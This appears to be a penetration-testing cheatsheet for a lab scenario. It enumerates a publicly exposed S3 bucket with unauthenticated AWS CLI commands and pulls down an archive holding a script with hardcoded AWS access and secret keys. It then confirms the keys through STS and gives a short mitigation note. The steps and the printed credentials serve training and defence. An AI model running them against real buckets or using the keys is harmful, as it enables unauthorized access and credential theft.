Cheatsheet - AWS - Scenario - Basic S3 enumeration

Overview

  • Service/Tool: Web browser, AWS CLI
  • Use Case: In this scenario we walk through a methodology for pivoting from a publicly exposed S3 bucket hosting a static website to obtaining AWS access keys.
  • Prerequisites: Access to a publicly accessible S3 bucket.

Attack Workflow

1. Step 1 (Discovery/Access)

  • Objective: Locate S3 bucket from static website.
  • Command/Method: Upon viewing the source code of the application in the web browser, we noted the following S3 URL:
<img src="[https://s3.amazonaws.com/dev.huge-logistics.com/static/logo.png](https://s3.amazonaws.com/dev.huge-logistics.com/static/logo.png)" width="100

From this we can see that the page's static resources are served from the S3 bucket dev.huge-logistics.com.
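
As a quick command-line sketch of this discovery step, the page source can also be pulled and grepped for S3 references (the site URL here is an assumption, since only the bucket name is confirmed above):

curl -s https://dev.huge-logistics.com/ | grep -Eo 'https://s3\.amazonaws\.com/[^"]+'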

  • Expected Output: In this step we located an S3 bucket to target for further reconnaissance.

2. Step 2 (Credential access via unsecured credentials)

  • Objective: Query the S3 bucket to locate sensitive files.
  • Command/Method:

Run an ls command against the S3 bucket via the AWS CLI:

aws s3 ls s3://dev.huge-logistics.com --no-sign-request

The --no-sign-request flag sends the request unauthenticated rather than signing it with any locally configured AWS keys.

We can then run a recursive ls on the S3 bucket to discover accessible files:

aws s3 ls s3://dev.huge-logistics.com --recursive --no-sign-request

We can also stream a file's contents directly to the terminal via cp, using a dash (-) as the destination:

aws s3 cp s3://dev.huge-logistics.com/admin/file.txt - --no-sign-request
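
Where many files are of interest, the entire accessible bucket can also be mirrored locally with sync (a sketch; this copies everything the anonymous principal is permitted to read):

aws s3 sync s3://dev.huge-logistics.com . --no-sign-request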

In this particular scenario we were able to uncover the following file:

aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request

2023-10-17 01:08:33          0 
2023-10-17 01:09:01        993 hl_migration_project.zip

We were then able to pull down this file, which contained a script with hardcoded credentials.
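
A likely download command, assuming the shared/ prefix and filename from the listing above (the trailing dot writes the file to the current directory):

$ aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request

Unzipping the archive and reviewing the script: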

$ unzip hl_migration_project.zip 
Archive:  hl_migration_project.zip
  inflating: migrate_secrets.ps1     
$ cat migrate_secrets.ps1 
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

We can then verify that these credentials are valid by configuring them (e.g. with aws configure or via environment variables) and running a whoami-style check against STS:
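
A minimal sketch of setting the keys as environment variables (an alternative to an interactive aws configure run; the region value comes from the script above):

$ export AWS_ACCESS_KEY_ID=AKIA3SFMDAPOWOWKXEHU
$ export AWS_SECRET_ACCESS_KEY=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
$ export AWS_DEFAULT_REGION=us-east-1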

$ aws sts get-caller-identity
{
    "UserId": "AIDA3SFMDAPOYPM3X2TB7",
    "Account": "794929857501",
    "Arn": "arn:aws:iam::794929857501:user/pam-test"
}
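
Another whoami-style check is sts get-access-key-info, which maps an access key ID to the account that owns it (shown here with the key recovered above; note this call may require the sts:GetAccessKeyInfo permission):

$ aws sts get-access-key-info --access-key-id AKIA3SFMDAPOWOWKXEHU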
  • Expected Output: Sensitive files that may lead to further compromise of the AWS environment.

Detection and Defense

  • Mitigation Techniques:
    • Do not store sensitive files in publicly exposed S3 buckets. Even files exposed for only a short time should be considered compromised (see the sketch below for one preventative control).
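
One preventative control, sketched here against the bucket from this scenario, is enabling S3 Block Public Access on the bucket (it can also be enforced account-wide):

aws s3api put-public-access-block \
    --bucket dev.huge-logistics.com \
    --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true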

Notes and References